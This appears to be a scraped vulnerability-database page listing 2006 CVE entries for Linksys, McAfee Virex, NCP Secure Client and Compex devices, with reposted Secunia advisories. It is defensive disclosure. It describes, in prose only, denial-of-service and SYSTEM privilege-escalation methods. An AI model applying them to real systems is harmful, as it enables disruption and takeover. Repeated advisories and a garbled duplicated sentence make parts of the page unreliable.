Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0053 | CVE-2006-1067 | Linksys WRT54G Multiple router denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic.
This issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users.
Linksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed
VAR-200603-0512 | CVE-2006-0982 | McAfee Virex Online Scanner Remote Attack Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The on-access scanner for McAfee Virex 7.7 for Macintosh, in some circumstances, might not activate when malicious content is accessed from the web browser, and might not prevent the content from being saved, which allows remote attackers to bypass virus protection, as demonstrated using the EICAR test file. The McAfee Virex 7.7 Mac uses an online scanner. As shown in the EICAR test file. Virex is prone to a security bypass vulnerability
VAR-200603-0494 | CVE-2006-0964 | NCP Network Communication Secure Client of Client Firewall Vulnerable to bypassing firewall program execution rules |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Client Firewall in NCP Network Communication Secure Client 8.11 Build 146, and possibly other versions, allows local users to bypass firewall program execution rules by replacing an allowed program with an arbitrary program. NCP Secure Client is susceptible to multiple vulnerabilities.
The following issues have been identified:
- Firewall rules designed to allow only specific applications to access the network may be bypassed.
- Some applications are prone to local command-line-argument buffer-overflow vulnerabilities.
- The VPN client is susceptible to a remote denial-of-service vulnerability.
- The VPN client is susceptible to a local privilege-escalation vulnerability.
These issues allow local attackers to gain SYSTEM-level privileges, allowing them to completely compromise affected computers. Remote attackers may consume excessive CPU resources, denying service to legitimate users.
NCP Secure Client version 8.11 Build 146 on the Microsoft Windows platform is vulnerable to these issues; other versions may also be affected.
TITLE:
NCP Secure Entry Client Two Vulnerabilities
SECUNIA ADVISORY ID:
SA19082
VERIFY ADVISORY:
http://secunia.com/advisories/19082/
CRITICAL:
Less critical
IMPACT:
Privilege escalation
WHERE:
Local system
SOFTWARE:
NCP Secure Entry Client 8.x
http://secunia.com/product/8515/
DESCRIPTION:
Ramon 'ports' Kukla has reported two vulnerabilities in NCP Secure
Entry Cilent, which can be exploited by malicious, local users to
gain escalated privileges.
1) A design error in the handling of command line options passed to
ncpmon.exe can be exploited to bypass the "Configuration Locks"
settings and to make certain configuration changes by running
ncpmon.exe with a command line argument of more than 261 characters.
2) Insecure permissions in the installation directory can be
exploited by malicious users to create files within the directory.
This reportedly can be further exploited by creating a "connect.bat"
file that will be run with SYSTEM privileges when a VPN connection is
established.
The vulnerabilities have been reported in version 8.11 Build 146.
Other versions may also be affected.
SOLUTION:
Restrict access to affect systems.
PROVIDED AND/OR DISCOVERED BY:
Ramon 'ports' Kukla
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/042640.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0490 | CVE-2006-0960 | Compex NetPassage WPE54G uConfig Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
uConfig agent in Compex NetPassage WPE54G router allows remote attackers to cause a denial of service (unresposiveness) via crafted datagrams to UDP port 7778. NetPassage WPE54G is prone to a remote denial-of-service vulnerability. This issue is due to a failure in the device to properly handle user-supplied input.
An attacker can exploit this issue to crash the affected device, effectively denying service to legitimate users.
TITLE:
Compex NetPassage WPE54G Denial of Service Vulnerability
SECUNIA ADVISORY ID:
SA19037
VERIFY ADVISORY:
http://secunia.com/advisories/19037/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
>From local network
SOFTWARE:
Compex NetPassage WPE54G
http://secunia.com/product/8471/
DESCRIPTION:
/dev/0id has reported a vulnerability Compex NetPassage WPE54G, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the uConfig agent
within the handling of certain UDP datagrams.
SOLUTION:
Use of the network device on trusted networks only.
PROVIDED AND/OR DISCOVERED BY:
/dev/0id, Ukr Security Team.
ORIGINAL ADVISORY:
http://www.security.nnov.ru/Ldocument605.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0498 | CVE-2006-0968 | NCP ncprwsnt Security Client Multi-Vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ncprwsnt service in NCP Network Communication Secure Client 8.11 Build 146, and possibly other versions, allows local users to execute arbitrary code by modifying the connect.bat script, which is automatically executed by the service after a connection is established. NCP Secure Client is susceptible to multiple vulnerabilities.
The following issues have been identified:
- Firewall rules designed to allow only specific applications to access the network may be bypassed.
- Some applications are prone to local command-line-argument buffer-overflow vulnerabilities.
- The VPN client is susceptible to a remote denial-of-service vulnerability.
- The VPN client is susceptible to a local privilege-escalation vulnerability.
These issues allow local attackers to gain SYSTEM-level privileges, allowing them to completely compromise affected computers. Remote attackers may consume excessive CPU resources, denying service to legitimate users.
NCP Secure Client version 8.11 Build 146 on the Microsoft Windows platform is vulnerable to these issues; other versions may also be affected.
TITLE:
NCP Secure Entry Client Two Vulnerabilities
SECUNIA ADVISORY ID:
SA19082
VERIFY ADVISORY:
http://secunia.com/advisories/19082/
CRITICAL:
Less critical
IMPACT:
Privilege escalation
WHERE:
Local system
SOFTWARE:
NCP Secure Entry Client 8.x
http://secunia.com/product/8515/
DESCRIPTION:
Ramon 'ports' Kukla has reported two vulnerabilities in NCP Secure
Entry Cilent, which can be exploited by malicious, local users to
gain escalated privileges.
1) A design error in the handling of command line options passed to
ncpmon.exe can be exploited to bypass the "Configuration Locks"
settings and to make certain configuration changes by running
ncpmon.exe with a command line argument of more than 261 characters.
2) Insecure permissions in the installation directory can be
exploited by malicious users to create files within the directory.
This reportedly can be further exploited by creating a "connect.bat"
file that will be run with SYSTEM privileges when a VPN connection is
established.
The vulnerabilities have been reported in version 8.11 Build 146.
Other versions may also be affected.
SOLUTION:
Restrict access to affect systems.
PROVIDED AND/OR DISCOVERED BY:
Ramon 'ports' Kukla
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/042640.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0497 | CVE-2006-0967 | NCP Network Communication Security Client Denial of Service Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
NCP Network Communication Secure Client 8.11 Build 146, and possibly other versions, allows local users to cause a denial of service (memory usage and cpu utilization) via a flood of arbitrary UDP datagrams to ports 0 to 65000. NOTE: this issue was reported as a buffer overflow, but that term usually does not apply in flooding attacks. NCP Secure Client is susceptible to multiple vulnerabilities.
The following issues have been identified:
- Firewall rules designed to allow only specific applications to access the network may be bypassed.
- Some applications are prone to local command-line-argument buffer-overflow vulnerabilities.
- The VPN client is susceptible to a remote denial-of-service vulnerability.
- The VPN client is susceptible to a local privilege-escalation vulnerability.
These issues allow local attackers to gain SYSTEM-level privileges, allowing them to completely compromise affected computers. Remote attackers may consume excessive CPU resources, denying service to legitimate users.
NCP Secure Client version 8.11 Build 146 on the Microsoft Windows platform is vulnerable to these issues; other versions may also be affected.
TITLE:
NCP Secure Entry Client Two Vulnerabilities
SECUNIA ADVISORY ID:
SA19082
VERIFY ADVISORY:
http://secunia.com/advisories/19082/
CRITICAL:
Less critical
IMPACT:
Privilege escalation
WHERE:
Local system
SOFTWARE:
NCP Secure Entry Client 8.x
http://secunia.com/product/8515/
DESCRIPTION:
Ramon 'ports' Kukla has reported two vulnerabilities in NCP Secure
Entry Cilent, which can be exploited by malicious, local users to
gain escalated privileges.
1) A design error in the handling of command line options passed to
ncpmon.exe can be exploited to bypass the "Configuration Locks"
settings and to make certain configuration changes by running
ncpmon.exe with a command line argument of more than 261 characters.
2) Insecure permissions in the installation directory can be
exploited by malicious users to create files within the directory.
This reportedly can be further exploited by creating a "connect.bat"
file that will be run with SYSTEM privileges when a VPN connection is
established.
The vulnerabilities have been reported in version 8.11 Build 146.
Other versions may also be affected.
SOLUTION:
Restrict access to affect systems.
PROVIDED AND/OR DISCOVERED BY:
Ramon 'ports' Kukla
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/042640.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------